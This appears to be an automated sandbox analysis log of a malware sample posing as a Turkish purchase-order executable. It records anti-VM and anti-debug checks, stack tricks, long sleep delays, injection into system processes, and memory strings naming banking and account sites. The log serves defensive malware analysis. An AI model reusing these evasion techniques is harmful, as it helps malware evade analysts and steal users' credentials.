Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe PID: 7728, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\unregmp2.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 48D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 8B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 9B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 9D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: AD40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: B150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: C150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: D150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: E150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: F150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 10150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Memory allocated: 11150000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Code function: 5_2_0140096E rdtsc

5_2_0140096E

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6157	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2439	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Window / User API: threadDelayed 9764	Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unregmp2.exe	API coverage: 2.5 %

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe TID: 7752	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7532	Thread sleep count: 208 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7532	Thread sleep time: -416000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7532	Thread sleep count: 9764 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7532	Thread sleep time: -19528000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe TID: 7652	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe TID: 7652	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe TID: 7652	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe TID: 7652	Thread sleep time: -41000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\unregmp2.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\unregmp2.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\unregmp2.exe

Code function: 7_2_0042BE00 FindFirstFileW,FindNextFileW,FindClose,

7_2_0042BE00

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 7454168B.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 7454168B.7.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: unregmp2.exe, 00000007.00000002.3846142193.000000000066A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!(
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 7454168B.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 7454168B.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 7454168B.7.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 7454168B.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 7454168B.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 7454168B.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 7454168B.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3847444137.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 7454168B.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 7454168B.7.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 7454168B.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 7454168B.7.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 7454168B.7.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 7454168B.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 7454168B.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 7454168B.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 7454168B.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 7454168B.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: firefox.exe, 0000000C.00000002.1897851487.0000019F4B2BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Code function: 5_2_0140096E rdtsc

5_2_0140096E

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Code function: 5_2_00417893 LdrLoadDll,

5_2_00417893

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01454144 mov eax, dword ptr fs:[00000030h]	5_2_01454144
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01454144 mov eax, dword ptr fs:[00000030h]	5_2_01454144
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01454144 mov ecx, dword ptr fs:[00000030h]	5_2_01454144
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01454144 mov eax, dword ptr fs:[00000030h]	5_2_01454144
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01454144 mov eax, dword ptr fs:[00000030h]	5_2_01454144
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F0124 mov eax, dword ptr fs:[00000030h]	5_2_013F0124
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01458158 mov eax, dword ptr fs:[00000030h]	5_2_01458158
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov eax, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov ecx, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov eax, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov eax, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov ecx, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov eax, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov eax, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov ecx, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov eax, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146E10E mov ecx, dword ptr fs:[00000030h]	5_2_0146E10E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01480115 mov eax, dword ptr fs:[00000030h]	5_2_01480115
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146A118 mov ecx, dword ptr fs:[00000030h]	5_2_0146A118
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146A118 mov eax, dword ptr fs:[00000030h]	5_2_0146A118
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146A118 mov eax, dword ptr fs:[00000030h]	5_2_0146A118
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146A118 mov eax, dword ptr fs:[00000030h]	5_2_0146A118
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6154 mov eax, dword ptr fs:[00000030h]	5_2_013C6154
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6154 mov eax, dword ptr fs:[00000030h]	5_2_013C6154
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BC156 mov eax, dword ptr fs:[00000030h]	5_2_013BC156
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014861C3 mov eax, dword ptr fs:[00000030h]	5_2_014861C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014861C3 mov eax, dword ptr fs:[00000030h]	5_2_014861C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0143E1D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0143E1D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_0143E1D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0143E1D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0143E1D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BA197 mov eax, dword ptr fs:[00000030h]	5_2_013BA197
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BA197 mov eax, dword ptr fs:[00000030h]	5_2_013BA197
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BA197 mov eax, dword ptr fs:[00000030h]	5_2_013BA197
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014961E5 mov eax, dword ptr fs:[00000030h]	5_2_014961E5
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01400185 mov eax, dword ptr fs:[00000030h]	5_2_01400185
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01464180 mov eax, dword ptr fs:[00000030h]	5_2_01464180
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01464180 mov eax, dword ptr fs:[00000030h]	5_2_01464180
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F01F8 mov eax, dword ptr fs:[00000030h]	5_2_013F01F8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147C188 mov eax, dword ptr fs:[00000030h]	5_2_0147C188
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147C188 mov eax, dword ptr fs:[00000030h]	5_2_0147C188
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144019F mov eax, dword ptr fs:[00000030h]	5_2_0144019F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144019F mov eax, dword ptr fs:[00000030h]	5_2_0144019F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144019F mov eax, dword ptr fs:[00000030h]	5_2_0144019F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144019F mov eax, dword ptr fs:[00000030h]	5_2_0144019F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01446050 mov eax, dword ptr fs:[00000030h]	5_2_01446050
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BA020 mov eax, dword ptr fs:[00000030h]	5_2_013BA020
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BC020 mov eax, dword ptr fs:[00000030h]	5_2_013BC020
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE016 mov eax, dword ptr fs:[00000030h]	5_2_013DE016
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE016 mov eax, dword ptr fs:[00000030h]	5_2_013DE016
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE016 mov eax, dword ptr fs:[00000030h]	5_2_013DE016
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE016 mov eax, dword ptr fs:[00000030h]	5_2_013DE016
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01444000 mov ecx, dword ptr fs:[00000030h]	5_2_01444000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000 mov eax, dword ptr fs:[00000030h]	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EC073 mov eax, dword ptr fs:[00000030h]	5_2_013EC073
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C2050 mov eax, dword ptr fs:[00000030h]	5_2_013C2050
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01456030 mov eax, dword ptr fs:[00000030h]	5_2_01456030
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014420DE mov eax, dword ptr fs:[00000030h]	5_2_014420DE
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014460E0 mov eax, dword ptr fs:[00000030h]	5_2_014460E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014020F0 mov ecx, dword ptr fs:[00000030h]	5_2_014020F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C208A mov eax, dword ptr fs:[00000030h]	5_2_013C208A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BC0F0 mov eax, dword ptr fs:[00000030h]	5_2_013BC0F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C80E9 mov eax, dword ptr fs:[00000030h]	5_2_013C80E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BA0E3 mov ecx, dword ptr fs:[00000030h]	5_2_013BA0E3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014580A8 mov eax, dword ptr fs:[00000030h]	5_2_014580A8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014860B8 mov eax, dword ptr fs:[00000030h]	5_2_014860B8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014860B8 mov ecx, dword ptr fs:[00000030h]	5_2_014860B8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01442349 mov eax, dword ptr fs:[00000030h]	5_2_01442349
